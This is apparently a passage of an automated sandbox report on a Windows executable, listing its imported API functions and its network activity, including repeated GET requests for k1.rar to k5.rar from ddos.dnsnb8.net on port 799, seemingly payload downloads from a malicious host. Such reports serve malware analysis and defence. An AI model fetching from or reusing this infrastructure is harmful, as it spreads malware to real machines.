0x52e3a8 FindClose
0x52e3ac DuplicateHandle
0x52e3b0 SetEndOfFile
0x52e3b4 UnlockFile
0x52e3b8 LockFile
0x52e3bc FlushFileBuffers
0x52e3c0 SetFilePointer
0x52e3c4 WriteFile
0x52e3c8 ReadFile
0x52e3cc GetThreadLocale
0x52e3d0 lstrlenA
0x52e3d4 CreateFileW
0x52e3d8 GetFileSize
0x52e3dc GetFileAttributesW
0x52e3e0 lstrcpyW
0x52e3e8 TlsFree
0x52e3f0 LocalReAlloc
0x52e3f4 TlsSetValue
0x52e3f8 TlsAlloc
0x52e400 GlobalHandle
0x52e404 GlobalReAlloc
0x52e40c TlsGetValue
0x52e414 LocalAlloc
0x52e418 GlobalFlags
0x52e420 GetModuleHandleA
0x52e424 CopyFileW
0x52e428 GlobalSize
0x52e42c FormatMessageW
0x52e430 LocalFree
0x52e434 MulDiv
0x52e43c GlobalFindAtomW
0x52e440 GetVersionExW
0x52e444 CompareStringW
0x52e448 LoadLibraryA
0x52e44c GetVersionExA
0x52e450 GetCurrentProcessId
0x52e454 SetLastError
0x52e458 GlobalAddAtomW
Library USER32.dll:
0x52e4ec MapVirtualKeyExW
0x52e4f0 GetKeyNameTextW
0x52e4f4 IsCharLowerW
0x52e4f8 GetMenuDefaultItem
0x52e4fc SetMenuDefaultItem
0x52e500 UpdateLayeredWindow
0x52e504 EnableScrollBar
0x52e508 UnionRect
0x52e50c SetCursorPos
0x52e510 DrawFocusRect
0x52e514 DrawFrameControl
0x52e518 DrawEdge
0x52e51c DrawIconEx
0x52e520 UnpackDDElParam
0x52e524 ReuseDDElParam
0x52e528 InsertMenuItemW
0x52e530 UnregisterClassW
0x52e534 GetNextDlgGroupItem
0x52e538 InvalidateRgn
0x52e53c SetRect
0x52e540 CharNextW
0x52e544 EmptyClipboard
0x52e548 CloseClipboard
0x52e54c SetClipboardData
0x52e550 LoadImageW
0x52e554 DestroyIcon
0x52e558 CopyImage
0x52e55c OpenClipboard
0x52e560 DrawStateW
0x52e568 EnumChildWindows
0x52e56c LockWindowUpdate
0x52e570 BringWindowToTop
0x52e574 IsRectEmpty
0x52e578 KillTimer
0x52e57c InvalidateRect
0x52e580 IsMenu
0x52e584 SetClassLongW
0x52e588 SetParent
0x52e58c CreatePopupMenu
0x52e590 NotifyWinEvent
0x52e594 SetWindowRgn
0x52e59c LoadAcceleratorsW
0x52e5a4 GetAsyncKeyState
0x52e5a8 CharUpperW
0x52e5ac GetKeyboardState
0x52e5b0 GetKeyboardLayout
0x52e5b4 MapVirtualKeyW
0x52e5b8 ToUnicodeEx
0x52e5c0 PostThreadMessageW
0x52e5c4 GetSysColorBrush
0x52e5c8 SetRectEmpty
0x52e5cc DeleteMenu
0x52e5d0 WaitMessage
0x52e5d4 ReleaseCapture
0x52e5d8 LoadCursorW
0x52e5dc WindowFromPoint
0x52e5e0 SetCapture
0x52e5e4 EndPaint
0x52e5e8 GetWindowDC
0x52e5ec ReleaseDC
0x52e5f0 GetDC
0x52e5f4 ClientToScreen
0x52e5f8 GrayStringW
0x52e5fc DrawTextExW
0x52e600 DrawTextW
0x52e604 TabbedTextOutW
0x52e608 FillRect
0x52e60c InsertMenuW
0x52e610 RemoveMenu
0x52e614 GetMenuStringW
0x52e618 DestroyMenu
0x52e61c GetMenuItemInfoW
0x52e620 InflateRect
0x52e624 ShowWindow
0x52e628 SetWindowTextW
0x52e62c IsDialogMessageW
0x52e630 CheckDlgButton
0x52e638 SendDlgItemMessageW
0x52e63c SendDlgItemMessageA
0x52e640 IsChild
0x52e644 GetCapture
0x52e648 GetClassLongW
0x52e64c GetClassNameW
0x52e650 SetPropW
0x52e654 GetPropW
0x52e658 RemovePropW
0x52e65c SetFocus
0x52e664 GetWindowTextW
0x52e668 GetForegroundWindow
0x52e66c BeginDeferWindowPos
0x52e670 EndDeferWindowPos
0x52e674 GetTopWindow
0x52e678 UnhookWindowsHookEx
0x52e67c GetMessageTime
0x52e680 GetMessagePos
0x52e684 MapWindowPoints
0x52e688 ScrollWindow
0x52e68c TrackPopupMenu
0x52e690 SetMenu
0x52e694 SetScrollRange
0x52e698 GetScrollRange
0x52e69c SetScrollPos
0x52e6a0 GetScrollPos
0x52e6a4 SetForegroundWindow
0x52e6a8 ShowScrollBar
0x52e6ac UpdateWindow
0x52e6b0 GetMenuItemID
0x52e6b4 GetMenuItemCount
0x52e6b8 CreateWindowExW
0x52e6bc GetClassInfoExW
0x52e6c0 GetClassInfoW
0x52e6c4 RegisterClassW
0x52e6c8 GetSysColor
0x52e6cc AdjustWindowRectEx
0x52e6d0 ScreenToClient
0x52e6d4 EqualRect
0x52e6d8 DeferWindowPos
0x52e6dc GetScrollInfo
0x52e6e0 SetScrollInfo
0x52e6e4 SetWindowPlacement
0x52e6e8 GetDlgCtrlID
0x52e6ec DefWindowProcW
0x52e6f0 CallWindowProcW
0x52e6f4 CopyRect
0x52e6f8 PtInRect
0x52e6fc GetMenu
0x52e700 SetWindowLongW
0x52e704 IntersectRect
0x52e70c GetWindowPlacement
0x52e714 GetLastActivePopup
0x52e718 MessageBoxW
0x52e71c ShowOwnedPopups
0x52e720 SetCursor
0x52e724 SetWindowsHookExW
0x52e728 CallNextHookEx
0x52e72c GetMessageW
0x52e730 DefFrameProcW
0x52e734 DefMDIChildProcW
0x52e738 DrawMenuBar
0x52e740 FrameRect
0x52e744 GetUpdateRect
0x52e748 CharUpperBuffW
0x52e74c CopyIcon
0x52e750 SubtractRect
0x52e754 GetIconInfo
0x52e758 TranslateMessage
0x52e75c DispatchMessageW
0x52e760 IsWindowVisible
0x52e764 GetKeyState
0x52e768 PeekMessageW
0x52e76c GetCursorPos
0x52e770 ValidateRect
0x52e774 SetMenuItemBitmaps
0x52e77c LoadBitmapW
0x52e780 GetFocus
0x52e784 DestroyCursor
0x52e788 GetWindowRgn
0x52e78c CreateMenu
0x52e790 MoveWindow
0x52e794 GetDoubleClickTime
0x52e798 ModifyMenuW
0x52e79c GetMenuState
0x52e7a0 EnableMenuItem
0x52e7a4 CheckMenuItem
0x52e7a8 GetWindowRect
0x52e7ac LoadMenuW
0x52e7b0 GetSubMenu
0x52e7b4 GetDesktopWindow
0x52e7b8 GetActiveWindow
0x52e7bc SetActiveWindow
0x52e7c4 DestroyWindow
0x52e7c8 IsWindow
0x52e7cc GetWindowLongW
0x52e7d0 GetDlgItem
0x52e7d4 IsWindowEnabled
0x52e7d8 GetNextDlgTabItem
0x52e7dc EndDialog
0x52e7e0 GetWindow
0x52e7e8 GetParent
0x52e7ec MapDialogRect
0x52e7f0 SetWindowPos
0x52e7f4 WinHelpW
0x52e7fc OffsetRect
0x52e800 MessageBeep
0x52e804 RedrawWindow
0x52e808 IsZoomed
0x52e80c PostQuitMessage
0x52e810 PostMessageW
0x52e814 SetTimer
0x52e818 DrawIcon
0x52e81c GetClientRect
0x52e820 GetSystemMetrics
0x52e824 IsIconic
0x52e828 SendMessageW
0x52e82c AppendMenuW
0x52e830 GetSystemMenu
0x52e834 LoadIconW
0x52e838 EnableWindow
0x52e83c BeginPaint
Library GDI32.dll:
0x52e050 DeleteObject
0x52e054 SelectClipRgn
0x52e058 CreateRectRgn
0x52e05c GetViewportExtEx
0x52e060 GetWindowExtEx
0x52e064 GetPixel
0x52e068 PtVisible
0x52e06c RectVisible
0x52e070 TextOutW
0x52e074 Escape
0x52e078 SelectObject
0x52e07c SetViewportOrgEx
0x52e080 OffsetViewportOrgEx
0x52e084 SetViewportExtEx
0x52e088 ScaleViewportExtEx
0x52e08c SetWindowOrgEx
0x52e090 OffsetWindowOrgEx
0x52e094 SetWindowExtEx
0x52e098 ScaleWindowExtEx
0x52e09c ExtSelectClipRgn
0x52e0a0 DeleteDC
0x52e0a4 CreatePatternBrush
0x52e0a8 GetStockObject
0x52e0ac SelectPalette
0x52e0b0 GetObjectType
0x52e0b4 CreatePen
0x52e0b8 CreateSolidBrush
0x52e0bc CreateHatchBrush
0x52e0c4 OffsetRgn
0x52e0c8 SetTextColor
0x52e0cc GetRgnBox
0x52e0d0 CreateDIBitmap
0x52e0d8 GetTextMetricsW
0x52e0dc EnumFontFamiliesW
0x52e0e0 GetTextCharsetInfo
0x52e0e4 CreateRoundRectRgn
0x52e0e8 GetTextColor
0x52e0ec PatBlt
0x52e0f0 GetDIBits
0x52e0f4 RealizePalette
0x52e0f8 CombineRgn
0x52e0fc StretchBlt
0x52e100 SetPixel
0x52e104 CreateDIBSection
0x52e108 GetBkColor
0x52e10c SetRectRgn
0x52e110 GetMapMode
0x52e114 DPtoLP
0x52e118 CreateEllipticRgn
0x52e11c CreatePolygonRgn
0x52e120 Polyline
0x52e124 Ellipse
0x52e128 Polygon
0x52e12c Rectangle
0x52e130 RoundRect
0x52e134 CreatePalette
0x52e138 GetPaletteEntries
0x52e13c GetWindowOrgEx
0x52e140 PtInRegion
0x52e144 FillRgn
0x52e148 FrameRgn
0x52e14c GetBoundsRect
0x52e150 GetViewportOrgEx
0x52e154 LPtoDP
0x52e158 ExtFloodFill
0x52e15c SetPaletteEntries
0x52e168 EnumFontFamiliesExW
0x52e16c GetTextFaceW
0x52e170 SetPixelV
0x52e174 SetTextAlign
0x52e178 MoveToEx
0x52e17c LineTo
0x52e180 IntersectClipRect
0x52e184 ExcludeClipRect
0x52e188 SetMapMode
0x52e18c SetROP2
0x52e190 SetPolyFillMode
0x52e194 SetBkMode
0x52e198 RestoreDC
0x52e19c SaveDC
0x52e1a0 CopyMetaFileW
0x52e1a4 GetDeviceCaps
0x52e1ac ExtTextOutW
0x52e1b0 BitBlt
0x52e1b4 CreateCompatibleDC
0x52e1b8 CreateFontIndirectW
0x52e1bc GetObjectW
0x52e1c0 GetClipBox
0x52e1c4 GetDCOrgEx
0x52e1c8 SetDIBColorTable
0x52e1cc CreateBitmap
0x52e1d0 SetBkColor
Library MSIMG32.dll:
0x52e460 TransparentBlt
0x52e464 AlphaBlend
Library COMDLG32.dll:
0x52e048 GetFileTitleW
Library WINSPOOL.DRV:
0x52e84c ClosePrinter
0x52e850 OpenPrinterW
0x52e854 DocumentPropertiesW
Library ADVAPI32.dll:
0x52e000 RegEnumKeyExW
0x52e00c RegCloseKey
0x52e010 RegQueryValueExW
0x52e014 RegOpenKeyExW
0x52e018 RegCreateKeyExW
0x52e01c RegSetValueExW
0x52e020 RegDeleteValueW
0x52e024 RegDeleteKeyW
0x52e028 OpenProcessToken
0x52e02c RegQueryValueW
0x52e030 RegOpenKeyW
0x52e034 RegEnumKeyW
Library SHELL32.dll:
0x52e4ac DragQueryFileW
0x52e4b4 SHBrowseForFolderW
0x52e4b8 ShellExecuteW
0x52e4bc SHAppBarMessage
0x52e4c0 DragFinish
0x52e4c4 SHGetFileInfoW
Library COMCTL32.dll:
Library SHLWAPI.dll:
0x52e4cc PathFindExtensionW
0x52e4d0 PathFindFileNameW
0x52e4d4 PathStripToRootW
0x52e4d8 PathIsUNCW
0x52e4dc PathFileExistsA
0x52e4e0 PathRemoveFileSpecW
Library oledlg.dll:
0x52e92c OleUIBusyW
Library ole32.dll:
0x52e8ac CoInitializeEx
0x52e8b0 CoUninitialize
0x52e8b4 OleInitialize
0x52e8bc OleUninitialize
0x52e8c0 OleGetClipboard
0x52e8c4 DoDragDrop
0x52e8c8 OleFlushClipboard
0x52e8dc CoGetClassObject
0x52e8e4 OleDuplicateData
0x52e8e8 CoTaskMemAlloc
0x52e8ec ReleaseStgMedium
0x52e8f0 CoTaskMemFree
0x52e8f4 CLSIDFromString
0x52e8f8 CLSIDFromProgID
0x52e8fc IsAccelerator
0x52e904 CoRevokeClassObject
0x52e908 RevokeDragDrop
0x52e910 RegisterDragDrop
0x52e914 CoCreateInstance
0x52e920 OleLockRunning
Library OLEAUT32.dll:
0x52e46c VariantCopy
0x52e470 SafeArrayDestroy
0x52e480 SysAllocString
0x52e484 SysStringLen
0x52e488 VariantInit
0x52e48c VariantChangeType
0x52e490 VariantClear
0x52e494 SysAllocStringLen
0x52e498 SysFreeString
Library gdiplus.dll:
0x52e85c GdipDrawImageI
0x52e864 GdiplusShutdown
0x52e868 GdiplusStartup
0x52e870 GdipBitmapLockBits
0x52e880 GdipGetImagePalette
0x52e88c GdipGetImageHeight
0x52e890 GdipGetImageWidth
0x52e894 GdipDisposeImage
0x52e898 GdipDeleteGraphics
0x52e89c GdipAlloc
0x52e8a0 GdipFree
0x52e8a4 GdipCloneImage
Library IMM32.dll:
0x52e1d8 ImmGetOpenStatus
0x52e1dc ImmReleaseContext
0x52e1e0 ImmGetContext
Library WINMM.dll:
0x52e844 PlaySoundW

Hosts

No hosts contacted.

TCP

Source          Source Port  Destination     Destination Host  Destination Port
192.168.56.101  49178        63.251.106.25   ddos.dnsnb8.net   799
192.168.56.101  49179        63.251.106.25   ddos.dnsnb8.net   799
192.168.56.101  49180        63.251.106.25   ddos.dnsnb8.net   799
192.168.56.101  49181        63.251.106.25   ddos.dnsnb8.net   799
192.168.56.101  49182        63.251.106.25   ddos.dnsnb8.net   799
192.168.56.101  49183        63.251.106.25   ddos.dnsnb8.net   799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k3.rar
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k2.rar
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k5.rar
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

http://ddos.dnsnb8.net:799/cj//k4.rar
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.